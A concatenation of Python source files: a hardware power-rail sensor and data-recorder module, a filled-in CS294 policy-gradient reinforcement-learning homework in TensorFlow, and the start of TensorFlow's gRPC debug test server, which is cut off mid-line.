self.parents = tuple() @property def value(self): """Read the current value of the sensor """ if _lib: _lib.sensors_get_value(self._chip, self._number, self._value) return self._value[0] else: return 0 def get_value(self, parents=None): return self.value def __repr__(self): return "Sensor {{name={}, value={}{}}}".format( self.name, self.value, self._unit) class Rail: """Bundles up to three sensors monitoring the same power rail Represents a power rail in the system monitored by up to three sensors for voltage, current and power. Attributes ---------- name : str Name of the power rail voltage : Sensor or None Voltage sensor for the rail or None if not available current : Sensor or None Current sensor for the rail or None if not available power : Sensor or None Power sensor for the rail or None if not available """ def __init__(self, name): """Create a new Rail with the specified rail """ self.name = name self.voltage = None self.current = None self.power = None def __repr__(self): args = ["name=" + self.name] if self.voltage: args.append("voltage=" + repr(self.voltage)) if self.current: args.append("current=" + repr(self.current)) if self.power: args.append("power=" + repr(self.power)) return "Rail {{{}}}".format(', '.join(args)) class XrtInfoDump: def __init__(self, device): self._device = device self.parents = tuple() def get_value(self, parents=None): info = self._device.device_info return { "0v85_v": info.m0v85, "12v_aux_v": info.m12VAux, "12v_aux_i": info.mAuxCurr, "12v_pex_v": info.m12VPex, "12v_pex_i": info.mPexCurr, "12v_sw_v": info.m12vSW, "1v8_v": info.m1v8Top, "3v3_aux_v": info.m3v3Aux, "3v3_pex_v": info.m3v3Pex, "mgt0v9avcc_v": info.mMgt0v9, "mgtavtt_v": info.mMgtVtt, "sys_5v5_v": info.mSys5v5, "vccint_v": info.mVccIntVol, "vccint_i": info.mCurrent } class XrtSensor: def __init__(self, unit, name, scale, parent, field): self.parents = (parent,) self._unit = unit self.name = name self._scale = scale self._field = field def get_value(self, parents=None): if parents is None: parents = (self.parents[0].get_value(),) return parents[0][self._field] * self._scale @property def value(self): return self.get_value() def __repr__(self): return "Sensor {{name={}, value={}{}}}".format( self.name, self.value, self._unit) class XrtRail: def __init__(self, name, sample_dict, parent): self.name = name if name + "_v" in sample_dict: self.voltage = XrtSensor("V", name + "_vol", 0.001, parent, name + "_v") else: self.voltage = None if name + "_i" in sample_dict: self.current = XrtSensor("A", name + "_curr", 0.001, parent, name + "_i") else: self.current = None if self.voltage and self.current: self.power = DerivedPowerSensor(name + "_power", self.voltage, self.current) else: self.power = None def __repr__(self): args = ["name=" + self.name] if self.voltage: args.append("voltage=" + repr(self.voltage)) if self.current: args.append("current=" + repr(self.current)) if self.power: args.append("power=" + repr(self.power)) return "XrtRail {{{}}}".format(', '.join(args)) def get_xrt_sysfs_rails(device=None): if device is None: from pynq.pl_server import Device device = Device.active_device rail_names = ["0v85", "12v_aux", "12v_pex", "12v_sw", "1v8", "3v3_aux", "3v3_pex", "mgt0v9avcc", "mgtavtt", "sys_5v5", "vccint" ] infodump = XrtInfoDump(device) sample_dict = infodump.get_value() rails = {} for n in rail_names: rails[n] = XrtRail(n, sample_dict, infodump) return rails def _enumerate_sensors(config_file=None): if _lib is None: warnings.warn("Could not initialise libsensors library") return {} if config_file: with open(config_file, 'r') as handle: _lib.sensors_init(handle); else: _lib.sensors_init(_ffi.NULL) chip_nr = _ffi.new("int [1]") feature_nr = _ffi.new("int [1]") rails = {} chip_nr[0] = 0 cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr) while cn: feature_nr[0] = 0 feature = _lib.sensors_get_features(cn, feature_nr) while feature: name = _ffi.string(_lib.sensors_get_label(cn, feature)).decode() subfeature = None if feature.type == _lib.SENSORS_FEATURE_POWER: subfeature = _lib.sensors_get_subfeature( cn, feature, _lib.SENSORS_SUBFEATURE_POWER_INPUT) feature_type = "power" unit = "W" elif feature.type == _lib.SENSORS_FEATURE_IN: subfeature = _lib.sensors_get_subfeature( cn, feature, _lib.SENSORS_SUBFEATURE_IN_INPUT) feature_type = "voltage" unit = "V" elif feature.type == _lib.SENSORS_FEATURE_CURR: subfeature = _lib.sensors_get_subfeature( cn, feature, _lib.SENSORS_SUBFEATURE_CURR_INPUT) feature_type = "current" unit = "A" if subfeature: if name not in rails: rails[name] = Rail(name) setattr(rails[name], feature_type, Sensor(cn, subfeature.number, unit, "{}_{}".format( name, feature_type))) feature = _lib.sensors_get_features(cn, feature_nr) cn = _lib.sensors_get_detected_chips(_ffi.NULL, chip_nr) return rails def get_rails(config_file=None): """Returns a dictionary of power rails Parameters ---------- config_file : str Path to a configuration file for libsensors to use in place of the the system-wide default Returns ------- dict {str : Rail} Dictionary of power rails with the name of the rail as the key and a Rail object as the value """ return _enumerate_sensors(config_file) class MultiSensor: """Class for efficiently collecting the readings from multiple sensors """ def __init__(self, sensors): self._sensors = sensors def get_values(self): stored = {} return tuple((self._get_value(s, stored) for s in self._sensors)) def _get_value(self, sensor, stored): if sensor in stored: return stored[sensor] value = sensor.get_value([self._get_value(p, stored) for p in sensor.parents]) stored[sensor] = value return value class DataRecorder: """Class to record sensors during an execution The DataRecorder provides a way of recording sensor data using a `with` block. """ def __init__(self, *sensors): """Create a new DataRecorder attached to the specified sensors """ import pandas as pd self._record_index = -1 self._sensors = sensors self._getter = MultiSensor(sensors) self._columns = ['Mark'] self._times = [] self._columns.extend([s.name for s in sensors]) self._frame = pd.DataFrame(columns=self._columns, index = pd.DatetimeIndex([]), dtype='f4') self._callbacks = [] self._data = [] self._thread = None def __del__(self): if self._thread: self.stop() def reset(self): """Clear the internal state of the data recorder without forgetting which sensors to record """ self._frame.drop(self._frame.index, inplace=True) self._record_index = -1 def record(self, interval): """Start recording """ if self._thread: raise RuntimeError("DataRecorder is already recording") self._thread = threading.Thread( target=DataRecorder._thread_func, args=[self]) self._interval = interval self._done = False self._record_index += 1 self._thread.start() return self def __enter__(self): return self def __exit__(self, type, value, traceback): self.stop() return def stop(self): """Stops recording """ self._done = True self._thread.join() self._thread = None def mark(self): """Increment the Invocation count """ self._record_index += 1 return self._record_index def _thread_func(self): import pandas as pd while not self._done: row = [self._record_index] row.extend(self._getter.get_values()) self._frame.loc[pd.Timestamp.now()] = row time.sleep(self._interval) @property def frame(self): """Return a pandas DataFrame of the recorded data The frame consists of the following fields Index : The timestamp of the measurement Mark : counts the number of times that record or mark was called Sensors* : one column per sensor """ return self._frame
train_pg_f18.py
""" Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017 Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany """ import numpy as np import tensorflow as tf import gym import logz import os import time import inspect from multiprocessing import Process tf.logging.set_verbosity(tf.logging.ERROR) os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' #============================================================================================# # Utilities #============================================================================================# def normalize(values, mean=0., std=1.): values = (values - values.mean()) / (values.std() + 1e-8) return mean + (std + 1e-8) * values #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None): """ Builds a feedforward neural network arguments: input_placeholder: placeholder variable for the state (batch_size, input_size) output_size: size of the output layer scope: variable scope of the network n_layers: number of hidden layers size: dimension of the hidden layer activation: activation of the hidden layers output_activation: activation of the ouput layers returns: output placeholder of the network (the result of a forward pass) Hint: use tf.layers.dense """ # YOUR CODE HERE with tf.variable_scope(scope): h = input_placeholder for i in range(n_layers): h = tf.layers.dense(h, size, activation=activation, name='h{}'.format(i + 1)) output_placeholder = tf.layers.dense(h, output_size, activation=output_activation, name='output') return output_placeholder def pathlength(path): return len(path["reward"]) def setup_logger(logdir, locals_): # Configure output directory for logging logz.configure_output_dir(logdir) # Log experimental parameters args = inspect.getargspec(train_PG)[0] params = {k: locals_[k] if k in locals_ else None for k in args} logz.save_params(params) #============================================================================================# # Policy Gradient #============================================================================================# class Agent(object): def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args): super(Agent, self).__init__() self.ob_dim = computation_graph_args['ob_dim'] self.ac_dim = computation_graph_args['ac_dim'] self.discrete = computation_graph_args['discrete'] self.size = computation_graph_args['size'] self.n_layers = computation_graph_args['n_layers'] self.learning_rate = computation_graph_args['learning_rate'] self.pg_step = computation_graph_args['pg_step'] self.animate = sample_trajectory_args['animate'] self.max_path_length = sample_trajectory_args['max_path_length'] self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch'] self.gamma = estimate_return_args['gamma'] self.reward_to_go = estimate_return_args['reward_to_go'] self.nn_baseline = estimate_return_args['nn_baseline'] self.normalize_advantages = estimate_return_args['normalize_advantages'] def init_tf_sess(self): tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1) #tf_config = tf.ConfigProto() tf_config.gpu_options.allow_growth = True self.sess = tf.Session(config=tf_config) self.sess.__enter__() # equivalent to `with self.sess:` tf.global_variables_initializer().run() #pylint: disable=E1101 #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def define_placeholders(self): """ Placeholders for batch batch observations / actions / advantages in policy gradient loss function. See Agent.build_computation_graph for notation returns: sy_ob_no: placeholder for observations sy_ac_na: placeholder for actions sy_adv_n: placeholder for advantages """ sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32) if self.discrete: sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32) else: sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32) # YOUR CODE HERE sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32) return sy_ob_no, sy_ac_na, sy_adv_n #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def policy_forward_pass(self, sy_ob_no): """ Constructs the symbolic operation for the policy network outputs, which are the parameters of the policy distribution p(a|s) arguments: sy_ob_no: (batch_size, self.ob_dim) returns: the parameters of the policy. if discrete, the parameters are the logits of a categorical distribution over the actions sy_logits_na: (batch_size, self.ac_dim) if continuous, the parameters are a tuple (mean, log_std) of a Gaussian distribution over actions. log_std should just be a trainable variable, not a network output. sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) Hint: use the 'build_mlp' function to output the logits (in the discrete case) and the mean (in the continuous case). Pass in self.n_layers for the 'n_layers' argument, and pass in self.size for the 'size' argument. """ if self.discrete: # YOUR_CODE_HERE sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size) return sy_logits_na else: # YOUR_CODE_HERE sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size) sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim]) #sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim], dtype=tf.float32, trainable=True) return (sy_mean, sy_logstd) #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def sample_action(self, policy_parameters): """ Constructs a symbolic operation for stochastically sampling from the policy distribution arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) returns: sy_sampled_ac: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) Hint: for the continuous case, use the reparameterization trick: The output from a Gaussian distribution with mean 'mu' and std 'sigma' is mu + sigma * z, z ~ N(0, I) This reduces the problem to just sampling z. (Hint: use tf.random_normal!) """ if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean)) return sy_sampled_ac #========================================================================================# # ----------PROBLEM 2---------- #========================================================================================# def get_neg_log_prob(self, policy_parameters, sy_ac_na): """ Constructs a symbolic operation for computing the negative log probability of a set of actions that were actually taken according to the policy arguments: policy_parameters if discrete: logits of a categorical distribution over actions sy_logits_na: (batch_size, self.ac_dim) if continuous: (mean, log_std) of a Gaussian distribution over actions sy_mean: (batch_size, self.ac_dim) sy_logstd: (self.ac_dim,) sy_ac_na: if discrete: (batch_size,) if continuous: (batch_size, self.ac_dim) returns: sy_neg_logprob_n: (batch_size) Hint: For the discrete case, use the log probability under a categorical distribution. For the continuous case, use the log probability under a multivariate gaussian. """ if self.discrete: sy_logits_na = policy_parameters # YOUR_CODE_HERE sy_neg_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=sy_ac_na, logits=sy_logits_na ) else: sy_mean, sy_logstd = policy_parameters # YOUR_CODE_HERE sy = (sy_ac_na - sy_mean) / tf.exp(sy_logstd) sy_neg_logprob_n = 0.5 * tf.reduce_sum(sy * sy, axis=1) return sy_neg_logprob_n def build_computation_graph(self): """ Notes on notation: Symbolic variables have the prefix sy_, to distinguish them from the numerical values that are computed later in the function Prefixes and suffixes: ob - observation ac - action _no - this tensor should have shape (batch self.size /n/, observation dim) _na - this tensor should have shape (batch self.size /n/, action dim) _n - this tensor should have shape (batch self.size /n/) Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis is None ---------------------------------------------------------------------------------- loss: a function of self.sy_neg_logprob_n and self.sy_adv_n that we will differentiate to get the policy gradient. """ self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders() # The policy takes in an observation and produces a distribution over the action space self.policy_parameters = self.policy_forward_pass(self.sy_ob_no) # We can sample actions from this action distribution. # This will be called in Agent.sample_trajectory() where we generate a rollout. self.sy_sampled_ac = self.sample_action(self.policy_parameters) # We can also compute the logprob of the actions that were actually taken by the policy # This is used in the loss function. self.sy_neg_logprob_n = self.get_neg_log_prob(self.policy_parameters, self.sy_ac_na) #========================================================================================# # ----------PROBLEM 2---------- # Loss Function and Training Operation #========================================================================================# loss = tf.reduce_mean(self.sy_neg_logprob_n * self.sy_adv_n) # YOUR CODE HERE self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss) #========================================================================================# # ----------PROBLEM 6---------- # Optional Baseline # # Define placeholders for targets, a loss function and an update op for fitting a # neural network baseline. These will be used to fit the neural network baseline. #========================================================================================# if self.nn_baseline: self.baseline_prediction = tf.squeeze(build_mlp( self.sy_ob_no, 1, "nn_baseline", n_layers=self.n_layers, size=self.size)) # YOUR_CODE_HERE self.sy_target_n = tf.placeholder(shape=[None], name='target', dtype=tf.float32) # baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction) baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n) self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss) def sample_trajectories(self, itr, env): # Collect paths until we have enough timesteps timesteps_this_batch = 0 paths = [] while True: animate_this_episode = (len(paths)==0 and (itr % 10 == 0) and self.animate) path = self.sample_trajectory(env, animate_this_episode) paths.append(path) timesteps_this_batch += pathlength(path) if timesteps_this_batch > self.min_timesteps_per_batch: break return paths, timesteps_this_batch def sample_trajectory(self, env, animate_this_episode): ob = env.reset() obs, acs, rewards = [], [], [] steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.1) obs.append(ob) #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# # YOUR CODE HERE ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob.reshape(1, -1)}) ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > self.max_path_length: break path = {"observation" : np.array(obs, dtype=np.float32), "reward" : np.array(rewards, dtype=np.float32), "action" : np.array(acs, dtype=np.float32)} return path #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# def sum_of_rewards(self, re_n): """ Monte Carlo estimation of the Q function. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths ---------------------------------------------------------------------------------- Your code should construct numpy arrays for Q-values which will be used to compute advantages (which will in turn be fed to the placeholder you defined in Agent.define_placeholders). Recall that the expression for the policy gradient PG is PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] where tau=(s_0, a_0, ...) is a trajectory, Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), and b_t is a baseline which may depend on s_t. You will write code for two cases, controlled by the flag 'reward_to_go': Case 1: trajectory-based PG (reward_to_go = False) Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over entire trajectory (regardless of which time step the Q-value should be for). For this case, the policy gradient estimator is E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] where Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. Thus, you should compute Q_t = Ret(tau) Case 2: reward-to-go PG (reward_to_go = True) Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting from time step t. Thus, you should compute Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} Store the Q-values for all timesteps and all trajectories in a variable 'q_n', like the 'ob_no' and 'ac_na' above. """ # YOUR_CODE_HERE num_paths = len(re_n) sum_of_path_lengths = sum(len(r) for r in re_n) q_n = np.empty(sum_of_path_lengths) i = 0 for r in re_n: l = len(r) q_n[i + l - 1] = r[-1] for j in range(l - 2, -1, -1): q_n[i + j] = r[j] + self.gamma * q_n[i + j + 1] i += l if not self.reward_to_go: i = 0 for r in re_n: l = len(r) q_n[i:i + l] = q_n[i] i += l return q_n def compute_advantage(self, ob_no, q_n): """ Computes advantages by (possibly) subtracting a baseline from the estimated Q values let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths returns: adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ #====================================================================================# # ----------PROBLEM 6---------- # Computing Baselines #====================================================================================# if self.nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current batch of Q-values. (Goes with Hint # #bl2 in Agent.update_parameters. # YOUR CODE HERE b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no}) b_n = normalize(b_n, q_n.mean(), q_n.std()) adv_n = q_n - b_n else: adv_n = q_n.copy() return adv_n def estimate_return(self, ob_no, re_n): """ Estimates the returns over a set of trajectories. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ q_n = self.sum_of_rewards(re_n) adv_n = self.compute_advantage(ob_no, q_n) #====================================================================================# # ----------PROBLEM 3---------- # Advantage Normalization #====================================================================================# if self.normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. # YOUR_CODE_HERE adv_n = normalize(adv_n) return q_n, adv_n def update_parameters(self, ob_no, ac_na, q_n, adv_n): """ Update the parameters of the policy and (possibly) the neural network baseline, which is trained to approximate the value function. arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) ac_na: shape: (sum_of_path_lengths). q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths returns: nothing """ #====================================================================================# # ----------PROBLEM 6---------- # Optimizing Neural Network Baseline #====================================================================================# if self.nn_baseline: # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 in # Agent.compute_advantage.) # YOUR_CODE_HERE target_n = normalize(q_n) _ = self.sess.run(self.baseline_update_op, feed_dict={ self.sy_ob_no:ob_no, self.sy_target_n:target_n }) #====================================================================================# # ----------PROBLEM 3---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. # # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. # YOUR_CODE_HERE for i in range(self.pg_step): _ = self.sess.run(self.update_op, feed_dict={ self.sy_ob_no:ob_no, self.sy_ac_na:ac_na, self.sy_adv_n:adv_n }) def train_PG( exp_name, env_name, n_iter, gamma, min_timesteps_per_batch, max_path_length, learning_rate, reward_to_go, animate, logdir, normalize_advantages, nn_baseline, seed, n_layers, size, pg_step): start = time.time() #========================================================================================# # Set Up Logger #========================================================================================# setup_logger(logdir, locals()) #========================================================================================# # Set Up Env #========================================================================================# # Make the gym environment env = gym.make(env_name) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) env.seed(seed) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps # Is this env continuous, or self.discrete? discrete = isinstance(env.action_space, gym.spaces.Discrete) # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # Initialize Agent #========================================================================================# computation_graph_args = { 'n_layers': n_layers, 'ob_dim': ob_dim, 'ac_dim': ac_dim, 'discrete': discrete, 'size': size, 'learning_rate': learning_rate, 'pg_step': pg_step } sample_trajectory_args = { 'animate': animate, 'max_path_length': max_path_length, 'min_timesteps_per_batch': min_timesteps_per_batch, } estimate_return_args = { 'gamma': gamma, 'reward_to_go': reward_to_go, 'nn_baseline': nn_baseline, 'normalize_advantages': normalize_advantages, } agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args) # build computation graph agent.build_computation_graph() # tensorflow: config, session, variable initialization agent.init_tf_sess() #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) paths, timesteps_this_batch = agent.sample_trajectories(itr, env) total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) re_n = [path["reward"] for path in paths] q_n, adv_n = agent.estimate_return(ob_no, re_n) agent.update_parameters(ob_no, ac_na, q_n, adv_n) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument('env_name', type=str) parser.add_argument('--exp_name', type=str, default='vpg') parser.add_argument('--no_time', '-nt', action='store_true') parser.add_argument('--render', action='store_true') parser.add_argument('--discount', type=float, default=1.0) parser.add_argument('--n_iter', '-n', type=int, default=100) parser.add_argument('--batch_size', '-b', type=int, default=1000) parser.add_argument('--ep_len', '-ep', type=float, default=-1.) parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3) parser.add_argument('--reward_to_go', '-rtg', action='store_true') parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true') parser.add_argument('--nn_baseline', '-bl', action='store_true') parser.add_argument('--seed', type=int, default=1) parser.add_argument('--n_experiments', '-e', type=int, default=1) parser.add_argument('--n_layers', '-l', type=int, default=2) parser.add_argument('--size', '-s', type=int, default=64) parser.add_argument('--pg_step', '-ps', type=int, default=1) parser.add_argument('--gpu', type=int, default=0) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu) if not(os.path.exists('data')): os.makedirs('data') logdir = args.exp_name + '_' + args.env_name if not args.no_time: logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S") logdir = os.path.join('data', logdir) if not(os.path.exists(logdir)): os.makedirs(logdir) max_path_length = args.ep_len if args.ep_len > 0 else None processes = [] for e in range(args.n_experiments): seed = args.seed + 10*e print('Running experiment with seed %d'%seed) def train_func(): train_PG( exp_name=args.exp_name, env_name=args.env_name, n_iter=args.n_iter, gamma=args.discount, min_timesteps_per_batch=args.batch_size, max_path_length=max_path_length, learning_rate=args.learning_rate, reward_to_go=args.reward_to_go, animate=args.render, logdir=os.path.join(logdir,'%d'%seed), normalize_advantages=not(args.dont_normalize_advantages), nn_baseline=args.nn_baseline, seed=seed, n_layers=args.n_layers, size=args.size, pg_step=args.pg_step ) # # Awkward hacky process runs, because Tensorflow does not like # # repeatedly calling train_PG in the same thread. p = Process(target=train_func, args=tuple()) p.start() processes.append(p) # if you comment in the line below, then the loop will block # until this process finishes # p.join() for p in processes: p.join() if __name__ == "__main__": main()
grpc_debug_test_server.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """GRPC debug server for testing.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import errno import functools import hashlib import json import os import re import shutil import tempfile import threading import time import portpicker from tensorflow.core.debug import debug_service_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.core.util import event_pb2 from tensorflow.python.client import session from tensorflow.python.debug.lib import debug_data from tensorflow.python.debug.lib import debug_utils from tensorflow.python.debug.lib import grpc_debug_server from tensorflow.python.framework import constant_op from tensorflow.python.framework import errors from tensorflow.python.ops import variables from tensorflow.python.util import compat def _get_dump_file_path(dump_root, device_name, debug_node_name): """Get the file path of the dump file for a debug node. Args: dump_root: (str) Root dump directory. device_name: (str) Name of the device that the debug node resides on. debug_node_name: (str) Name of the debug node, e.g., cross_entropy/Log:0:DebugIdentity. Returns: (str) Full path of the dump file. """ dump_root = os.path.join( dump_root, debug_data.device_name_to_device_path(device_name)) if "/" in debug_node_name: dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name)) dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name)) else: dump_dir = dump_root dump_file_name = re.sub(":", "_", debug_node_name) now_microsec = int(round(time.time() * 1000 * 1000)) dump_file_name += "_%d" % now_microsec return os.path.join(dump_dir, dump_file_name) class EventListenerTestStreamHandler( grpc_debug_server.EventListenerBaseStreamHandler): """Implementation of EventListenerBaseStreamHandler that dumps to file.""" def __init__(self, dump_dir, event_listener_servicer): super(EventListenerTestStreamHandler, self).__init__() self._dump_dir = dump_dir self._event_listener_servicer = event_listener_servicer if self._dump_dir: self._try_makedirs(self._dump_dir) self._grpc_path = None self._cached_graph_defs = [] self._cached_graph_def_device_names = [] self._cached_graph_def_wall_times = [] def on_core_metadata_event(self, event): self._event_listener_servicer.toggle_watch() core_metadata = json.loads(event.log_message.message) if not self._grpc_path: grpc_path = core_metadata["grpc_path"] if grpc_path: if grpc_path.startswith("/"): grpc_path = grpc_path[1:] if self._dump_dir: self._dump_dir = os.path.join(self._dump_dir, grpc_path) # Write cached graph defs to filesystem. for graph_def, device_name, wall_time in zip( self._cached_graph_defs, self._cached_graph_def_device_names, self._cached_graph_def_wall_times): self._write_graph_def(graph_def, device_name, wall_time) if self._dump_dir: self._write_core_metadata_event(event) else: self._event_listener_servicer.core_metadata_json_strings.append( event.log_message.message) def on_graph_def(self, graph_def, device_name, wall_time): """Implementation of the tensor value-carrying Event proto callback. Args: graph_def: A GraphDef object. device_name: Name of the device on which the graph was created. wall_time: An epoch timestamp (in microseconds) for the graph. """ if self._dump_dir: if self._grpc_path: self._write_graph_def(graph_def, device_name, wall_time) else: self._cached_graph_defs.append(graph_def) self._cached_graph_def_device_names.append(device_name) self._cached_graph_def_wall_times.append(wall_time) else: self._event_listener_servicer.partition_graph_defs.append(graph_def) def on_value_event(self, event): """Implementation of the tensor value-carrying Event proto callback. Writes the Event proto to the file system for testing. The path written to follows the same pattern as the file:// debug URLs of tfdbg, i.e., the name scope of the op becomes the directory structure under the dump root directory. Args: event: The Event proto carrying a tensor value. Returns: If the debug node belongs to the set of currently activated breakpoints, a `EventReply` proto will be returned. """ if self._dump_dir: self._write_value_event(event) else: value = event.summary.value[0] tensor_value = debug_data.load_tensor_from_event(event) self._event_listener_servicer.debug_tensor_values[value.node_name].append( tensor_value) items = event.summary.value[0].node_name.split(":") node_name = items[0] output_slot = int(items[1]) debug_op = items[2] if ((node_name, output_slot, debug_op) in self._event_listener_servicer.breakpoints): return debug_service_pb2.EventReply() def _try_makedirs(self, dir_path): if not os.path.isdir(dir_path): try: os.makedirs(dir_path) except OSError as error: if error.errno != errno.EEXIST: raise def _write_core_metadata_event(self, event): core_metadata_path = os.path.join( self._dump_dir, debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG + "_%d" % event.wall_time) self._try_makedirs(self._dump_dir) with open(core_metadata_path, "wb") as f: f.write(event.SerializeToString()) def _write_graph_def(self, graph_def, device_name, wall_time): encoded_graph_def = graph_def.SerializeToString() graph_hash = 